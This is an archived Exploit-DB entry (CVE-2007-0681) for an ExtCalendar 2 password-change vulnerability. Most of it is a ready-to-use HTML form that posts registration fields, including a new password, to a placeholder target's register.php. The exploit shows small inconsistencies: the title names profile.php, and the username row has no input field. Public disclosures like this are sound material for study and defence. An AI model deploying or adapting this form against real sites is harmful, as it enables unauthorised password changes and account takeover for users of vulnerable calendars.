Extcalendar <= 2 profile.php Remote User Pass Change Exploit

2007-01-31T00:00:00
ID EDB-ID:3239
Type exploitdb
Reporter ajann
Modified 2007-01-31T00:00:00

Description

Extcalendar <= 2 (profile.php) Remote User Pass Change Exploit. CVE-2007-0681. Webapps exploit for php platform

                                        
	<form name="userform" action="http://[target]/register.php" method="post">
		<input name="step" type="hidden" value="regform">

		<tr>
			<td class='tableh2' colspan='2'>Account Information</td>

		</tr>
		<tr>
			<td class='tableb' width='160'>Username</td>
			<td class='tableb'>
			</td>
		</tr>
		<tr>
			<td class='tableb' width='160'>Password</td>

			<td class='tableb'><input type='password' name='password' class='textinput' value="" size='25' maxlength="16">
			</td>
		</tr>
		<tr>
			<td class='tableb' width='160'>Confirm Password</td>
			<td class='tableb'><input type='password' name='password_confirm' class='textinput' value="" size='25' maxlength="16">
			</td>
		</tr>

		<tr>
			<td class='tableb' width='160'>E-mail Address</td>
			<td class='tableb'><input type='text' name='email' class='textinput' value="" size='25'>
			</td>
		</tr>
		<tr>
			<td class='tableh2' colspan='2'>Other Details</td>
		</tr>

		<tr>
			<td class='tableb' width='160'>First Name</td>
			<td class='tableb'><input type='text' name='firstname' class='textinput' value="" size='25'>
			</td>
		</tr>
		<tr>
			<td class='tableb' width='160'>Last Name</td>
			<td class='tableb'><input type='text' name='lastname' class='textinput' value="" size='25'>

			</td>
		<tr>
			<td class='tableb' width='160'>Home page</td>
			<td class='tableb'><input type='text' name='user_website' class='textinput' value="" size='25'>
			</td>
		<tr>
			<td class='tableb' width='160'>Location</td>
			<td class='tableb'><input type='text' name='user_location' class='textinput' value="" size='25'>

			</td>
		<tr>
			<td class='tableb' width='160'>Occupation</td>
			<td class='tableb'><input type='text' name='user_occupation' class='textinput' value="" size='25'>
			</td>
		</tr>

		<tr>

			<td class='tablec' colspan='2' align='center' valign='middle' height='40'>
				<input name='submit' type='submit' value="&nbsp;&nbsp;Submit my registration&nbsp;&nbsp;" class='button'>
			</td>
		</tr>
<!-- END submit_row -->
	</form>

# milw0rm.com [2007-01-31]